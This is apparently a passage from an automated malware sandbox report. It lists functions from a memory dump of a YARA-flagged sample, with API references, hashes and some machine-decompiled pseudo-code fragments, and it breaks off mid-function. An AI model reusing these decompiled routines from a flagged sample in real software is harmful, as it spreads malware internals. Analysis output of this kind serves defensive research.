                                                                                                                          • Opcode ID: 1dc51e4a20ad0745621d0a36c88979ec0a75884888b3541c6b291b9879b3a170
                                                                                                                          • Instruction ID: 83811c8ca78a33826bc59e76750f49715a77075c99934890fbc3ac5f4e3f867a
                                                                                                                          • Opcode Fuzzy Hash: 1dc51e4a20ad0745621d0a36c88979ec0a75884888b3541c6b291b9879b3a170
                                                                                                                          • Instruction Fuzzy Hash: 41F05476204214AFD710EF98DC40EE777A9EF8C324F14855AFA5C9B241C631E911C7A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A100, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A100(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AB20(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                          0x0041a10f
                                                                                                                          0x0041a117
                                                                                                                          0x0041a139
                                                                                                                          0x0041a13d

                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
                                                                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                          • Instruction ID: b7acdae8d3035396bf3a6cabd8be047a375e4a620bd0b44aa6ca3e6eeb15d15e
                                                                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                          • Instruction Fuzzy Hash: 35F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F810CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A050, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                          • Instruction ID: b02a98072ae76633dfac5978dec5414655e95fa3032167deae29744f36717898
                                                                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                          • Instruction Fuzzy Hash: B7D01776200214ABD710EB99DC85FE77BADEF48764F15449ABA189B242C530FA1087E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A598F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: c08059c8d39986c266ec3b564c57194cb51267c14ad3a7dc0f58956e59467117
                                                                                                                          • Instruction ID: 2b00c330473683cdcf49ca9035436cfe5893d0128b37f70e722e3af19e02d915
                                                                                                                          • Opcode Fuzzy Hash: c08059c8d39986c266ec3b564c57194cb51267c14ad3a7dc0f58956e59467117
                                                                                                                          • Instruction Fuzzy Hash: 44900261B0100902D301716A4404616001A97D03C1F91C032A1014555ECE658992F171
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A59860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 0fd9178f70a7e71ebd60122c508530301637174e453e49a8a47c0c2c4e299b92
                                                                                                                          • Instruction ID: 01e38f4eb81fcfc3b52da05435d651a2bf1f17559722dc06c1b3839cd6de977f
                                                                                                                          • Opcode Fuzzy Hash: 0fd9178f70a7e71ebd60122c508530301637174e453e49a8a47c0c2c4e299b92
                                                                                                                          • Instruction Fuzzy Hash: 4390027170100813D311616A4504707001997D03C1F91C422A0414558D9A968952F161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A59840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 76474d9bfab59294fd345966eec180c452a464347f18b5f5857acdd24d0f8e4b
                                                                                                                          • Instruction ID: 477be5eacac807b1c07b371308cb66ba469d016b1b3fba5179a1500f9858a7c3
                                                                                                                          • Opcode Fuzzy Hash: 76474d9bfab59294fd345966eec180c452a464347f18b5f5857acdd24d0f8e4b
                                                                                                                          • Instruction Fuzzy Hash: 58900261742045529745B16A44045074016A7E03C1791C022A1404950C89669856E661
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: c00a2ce4298465445edb11e9c75c85e19878800e0dbb6b9d4f21566e1803aea2
                                                                                                                          • Instruction ID: 1fbeb9f4a196265c319d83f7f7a73e095c4030bce710e7cf97b14c271c05598e
                                                                                                                          • Opcode Fuzzy Hash: c00a2ce4298465445edb11e9c75c85e19878800e0dbb6b9d4f21566e1803aea2
                                                                                                                          • Instruction Fuzzy Hash: 229002A174100842D300616A4414B060015D7E1381F51C025E1054554D8A59CC52B166
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A59910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 936d5bd431cf65b5440d1e8f2c05715cab3582f30257bc2d7c5389eb7797b1f1
                                                                                                                          • Instruction ID: 5051a8728ddcd3ddaff522636ca02e390124de473acfd13d3dc867be3d27cc7d
                                                                                                                          • Opcode Fuzzy Hash: 936d5bd431cf65b5440d1e8f2c05715cab3582f30257bc2d7c5389eb7797b1f1
                                                                                                                          • Instruction Fuzzy Hash: DD9002B170100802D340716A4404746001597D0381F51C021A5054554E8A998DD5B6A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A59A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 8d87454f5c46e5fae9c03f0ee6a79da31d78d625c62e16acc8297979d1d2ccc2
                                                                                                                          • Instruction ID: 30ebf4fa561121fd242759a935b580e6bdf509c03ba0b502e53968c5a268aa1f
                                                                                                                          • Opcode Fuzzy Hash: 8d87454f5c46e5fae9c03f0ee6a79da31d78d625c62e16acc8297979d1d2ccc2
                                                                                                                          • Instruction Fuzzy Hash: 70900261B01004428340717A88449064015BBE1391751C131A0988550D89998865A6A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A59A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: f2874a4afe4d6c3c55638502c95c54242dc153b9df6319b867c8b7d54638b4f9
                                                                                                                          • Instruction ID: d708d50572dabf77037ba65f7d06f9c39b79d4fd425a6ffc4f606378db7112e4
                                                                                                                          • Opcode Fuzzy Hash: f2874a4afe4d6c3c55638502c95c54242dc153b9df6319b867c8b7d54638b4f9
                                                                                                                          • Instruction Fuzzy Hash: 7D90027170140802D300616A481470B001597D0382F51C021A1154555D8A658851B5B1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A59A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 500c44e3be1ebae3b88be177c01495a81812d1b5c42fe38173ded41edabcfa49
                                                                                                                          • Instruction ID: ae95439018a33f882898933aeccbda1d1cead807cff01d8db03f8af9d688d9e4
                                                                                                                          • Opcode Fuzzy Hash: 500c44e3be1ebae3b88be177c01495a81812d1b5c42fe38173ded41edabcfa49
                                                                                                                          • Instruction Fuzzy Hash: 5A90026171180442D300657A4C14B07001597D0383F51C125A0144554CCD558861A561
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: fbfb9f5feffeaa7b535b183bf9533fa37e7865cb3050d168e73e5a9c89fe1301
                                                                                                                          • Instruction ID: 97a5fda23c1b24338368ea9b93c6915b1a90db8d41c29f0a2ca1da82ad4ff69c
                                                                                                                          • Opcode Fuzzy Hash: fbfb9f5feffeaa7b535b183bf9533fa37e7865cb3050d168e73e5a9c89fe1301
                                                                                                                          • Instruction Fuzzy Hash: 279002A1702004038305716A4414616401A97E0381B51C031E1004590DC9658891B165
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A59540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 9fce2cec09b9c17aa8ba3fee7f6746af26cbcdbd32e5d25265f79c6b781eed8d
                                                                                                                          • Instruction ID: 3c2fbcffac64722869632978d3dd2c1f220107397aff334f17e908825ffe6250
                                                                                                                          • Opcode Fuzzy Hash: 9fce2cec09b9c17aa8ba3fee7f6746af26cbcdbd32e5d25265f79c6b781eed8d
                                                                                                                          • Instruction Fuzzy Hash: C9900265711004034305A56A0704507005697D53D1351C031F1005550CDA618861A161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 85c60e06488a2dbb414fb88158553794bea4ed22ea3219c4e98284aa01e2d55b
                                                                                                                          • Instruction ID: acee84d3fe0d625309e564dda8a708dcdfa0cdb1c4c0dc461eeb2c6f632d8efd
                                                                                                                          • Opcode Fuzzy Hash: 85c60e06488a2dbb414fb88158553794bea4ed22ea3219c4e98284aa01e2d55b
                                                                                                                          • Instruction Fuzzy Hash: C490027170108C02D310616A840474A001597D0381F55C421A4414658D8AD58891B161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A59660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 9c6d0281acda6bb6bfb3b45eff6439eed52d16c1f93929b52b8d5e5341128b18
                                                                                                                          • Instruction ID: 415763800343310357bec0ac22a3169653c4b1ef28b9263ff1170b2231815032
                                                                                                                          • Opcode Fuzzy Hash: 9c6d0281acda6bb6bfb3b45eff6439eed52d16c1f93929b52b8d5e5341128b18
                                                                                                                          • Instruction Fuzzy Hash: 0090027170100C02D380716A440464A001597D1381F91C025A0015654DCE558A59B7E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A597A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 0998dbb045e614b6d7d4b98059353b25502db52f8af53fa24aac7ee3053f24cc
                                                                                                                          • Instruction ID: 49c418bf6b4fa4533d0552a5655c2a86f22815154000726435ef00713740f73b
                                                                                                                          • Opcode Fuzzy Hash: 0998dbb045e614b6d7d4b98059353b25502db52f8af53fa24aac7ee3053f24cc
                                                                                                                          • Instruction Fuzzy Hash: C490026170100403D340716A54186064015E7E1381F51D021E0404554CDD558856A262
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A59780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: e98bbc099bb8e94ac721689e7872aa5c8358b902886a179c029f6f7bf5316b1b
                                                                                                                          • Instruction ID: f0b6b775975589f6b4309cfb8acaae6ef9e715327430011db5a0b8ae1c1d3095
                                                                                                                          • Opcode Fuzzy Hash: e98bbc099bb8e94ac721689e7872aa5c8358b902886a179c029f6f7bf5316b1b
                                                                                                                          • Instruction Fuzzy Hash: 8690026971300402D380716A540860A001597D1382F91D425A0005558CCD558869A361
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A59710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 751c9a40a795ac05bb600dfd0ca15db1be191e187a6359e9bf4fed078ae5554a
                                                                                                                          • Instruction ID: 3cee61e60112844d0df5cb95c008094d7d31ab21efc8912c3928464fdf4ba83b
                                                                                                                          • Opcode Fuzzy Hash: 751c9a40a795ac05bb600dfd0ca15db1be191e187a6359e9bf4fed078ae5554a
                                                                                                                          • Instruction Fuzzy Hash: 6F90027170100802D30065AA5408646001597E0381F51D021A5014555ECAA58891B171
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004082E8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71threadwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E004082E8(void* __ecx, void* __esi, long _a8) {
				char _v63;
				char _v64;
				long __edi;
				void* __ebp;
				void* _t16;

				_pop(ss);
				asm("bound eax, [ebx]");
				if(__esi + 1 >= 0) {
					_t16 = E0041B330(__ecx);
					if(_t16 == 0 || _t16 == 0x33333333) {
						__eflags = 0;
						return 0;
					} else {
						return  *_a8 + _t16;
					}
				} else {
					__eflags = __ecx;
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x40;
					_push(__esi);
					__eax =  &_v63;
					_v64 = 0;
					__eax = E0041BA20( &_v63, 0, 0x3f);
					__ecx =  &_v64;
					__eax = E0041C5C0( &_v64, 3);
					_a8 = _a8 + 0x1c;
					__eax = E0040ACC0(__ebx, __eflags, _a8 + 0x1c,  &_v64); // executed
					__eax = E00414E10(_a8 + 0x1c, __eax, 0, 0, 0xc4e7b6d6);
					__esi = __eax;
					__eflags = __esi;
					if(__esi != 0) {
						_push(__edi);
						__edi = _a8;
						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
						__eflags = __eax;
						if(__eflags == 0) {
							__eax = E0040A450(__eflags, 1, 8);
							__eax = __al & 0x000000ff;
							__ecx = __ebp + __eax - 0x40;
							__eax =  *__esi(__edi, 0x8003, __ebp + __eax - 0x40, __eax);
						}
						_pop(__edi);
					}
					_pop(__esi);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}








                                                                                                                          0x004082e8
                                                                                                                          0x004082ea
                                                                                                                          0x004082ec
                                                                                                                          0x00408298
                                                                                                                          0x0040829c
                                                                                                                          0x004082af
                                                                                                                          0x004082b2
                                                                                                                          0x004082a6
                                                                                                                          0x004082ae
                                                                                                                          0x004082ae
                                                                                                                          0x004082ee
                                                                                                                          0x004082ee
                                                                                                                          0x004082f0
                                                                                                                          0x004082f1
                                                                                                                          0x004082f3
                                                                                                                          0x004082f6
                                                                                                                          0x004082f9
                                                                                                                          0x004082ff
                                                                                                                          0x00408303
                                                                                                                          0x00408308
                                                                                                                          0x0040830e
                                                                                                                          0x0040831a
                                                                                                                          0x0040831e
                                                                                                                          0x0040832e
                                                                                                                          0x00408333
                                                                                                                          0x00408338
                                                                                                                          0x0040833a
                                                                                                                          0x0040833c
                                                                                                                          0x0040833d
                                                                                                                          0x0040834a
                                                                                                                          0x0040834c
                                                                                                                          0x0040834e
                                                                                                                          0x00408355
                                                                                                                          0x0040835a
                                                                                                                          0x00408360
                                                                                                                          0x0040836b
                                                                                                                          0x0040836b
                                                                                                                          0x0040836d
                                                                                                                          0x0040836d
                                                                                                                          0x0040836e
                                                                                                                          0x0040836f
                                                                                                                          0x00408371
                                                                                                                          0x00408372
                                                                                                                          0x00408372

                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID: 3333
                                                                                                                          • API String ID: 1836367815-2924271548
                                                                                                                          • Opcode ID: 1c1fdf9ce575306d9f46668dd5bea2b6c3600d1bccfd3aee02544c7a1e1693d2
                                                                                                                          • Instruction ID: e3d37af9f4a3ae998a1a31596c42953fdc38290ff275a8c2d8b9ad50d5f4676e
                                                                                                                          • Opcode Fuzzy Hash: 1c1fdf9ce575306d9f46668dd5bea2b6c3600d1bccfd3aee02544c7a1e1693d2
                                                                                                                          • Instruction Fuzzy Hash: 0C112B316402187FEB20A6949D42FFE77589F41B50F08406EFE44BB2C1DA78A90147EA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A1F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID: oLA
                                                                                                                          • API String ID: 1279760036-3789366272
                                                                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                          • Instruction ID: 91a8afe93875cd4dd2c16ce4d21e80b139c6b658c845053945d21e38953d9919
                                                                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                          • Instruction Fuzzy Hash: F1E012B1200208ABDB14EF99DC41EA777ADAF88664F11855ABA085B242C630F910CBB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A1B6, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID: oLA
                                                                                                                          • API String ID: 1279760036-3789366272
                                                                                                                          • Opcode ID: 3d6703e194277b1ae2e8de4049c75e70dfff0c7056d4e725db8d9ccf5dfbc693
                                                                                                                          • Instruction ID: af225ebbf115edaa80c7d7cc310b5c55c013cba1dca817a18a305c20c7dcea64
                                                                                                                          • Opcode Fuzzy Hash: 3d6703e194277b1ae2e8de4049c75e70dfff0c7056d4e725db8d9ccf5dfbc693
                                                                                                                          • Instruction Fuzzy Hash: 4DD0C9B4204108AB8700EF59E8808AB736AAF88218711854AFC1943301C535E8618AB6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E004082F0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041BA20( &_v67, 0, 0x3f);
				E0041C5C0( &_v68, 3);
				_t12 = E0040ACC0(__ebx, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A450(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                                          0x004082f0
                                                                                                                          0x004082ff
                                                                                                                          0x00408303
                                                                                                                          0x0040830e
                                                                                                                          0x0040831e
                                                                                                                          0x0040832e
                                                                                                                          0x00408333
                                                                                                                          0x0040833a
                                                                                                                          0x0040833d
                                                                                                                          0x0040834a
                                                                                                                          0x0040834c
                                                                                                                          0x0040834e
                                                                                                                          0x0040836b
                                                                                                                          0x0040836b
                                                                                                                          0x00000000
                                                                                                                          0x0040836d
                                                                                                                          0x00408372

                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1836367815-0
                                                                                                                          • Opcode ID: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                                                                                                          • Instruction ID: dfcb319d37f54b0a0ecf43278dd58f432490a67f975cf55f4cf339e9819450c2
                                                                                                                          • Opcode Fuzzy Hash: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                                                                                                          • Instruction Fuzzy Hash: 1A01A731A803287BE720A6A59C43FFF776C6B40F54F05411EFF04BA1C1E6A9691546FA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040ACB3, Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E0040ACB3(void* __eax, void* __ebx, void* __esi, char _a1, void* _a8, intOrPtr _a12) {
				char* _v4;
				struct _EXCEPTION_RECORD _v8;
				struct _OBJDIR_INFORMATION _v12;
				char _v532;
				signed int _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t23;
				struct _OBJDIR_INFORMATION _t25;
				void* _t26;
				signed int* _t27;
				char* _t35;
				char* _t38;
				void* _t42;
				char* _t44;

				_t26 = __ebx;
				_t17 = __eax - 0x5b;
				asm("in eax, 0x1f");
				ds = __esi;
				_t35 =  &_a1;
				_t44 = _t35;
				if(_t44 != 0) {
					L7:
					asm("cmpsb");
					 *_t27 =  *_t27 & _t17;
					_t7 = _t26 + 0x558b08c4;
					 *_t7 =  *((intOrPtr*)(_t26 + 0x558b08c4)) + _t17;
					__eflags =  *_t7;
					goto L8;
				} else {
					if(_t44 != 0) {
						L8:
						asm("les ecx, [eax]");
						goto L9;
					} else {
						asm("sbb [ebp-0x75], dl");
						_push(_t35);
						_t35 = _t38;
						_v4 =  &_v532;
						_t23 = E0041C810( &_v8, 0x104, _a12);
						_t42 = _t38 - 0x214 + 0xc;
						if(_t23 != 0) {
							_t25 = E0041CC30(__eflags, _v8);
							_t38 = _t42 + 4;
							__eflags = _t25;
							if(_t25 != 0) {
								_t27 =  &_v12;
								_t17 = E0041CEB0(_t27, 0);
								goto L7;
							}
							L9:
							_t18 = E0041B060(_v4);
							_v12 = _t18;
							__eflags = _t18;
							if(_t18 == 0) {
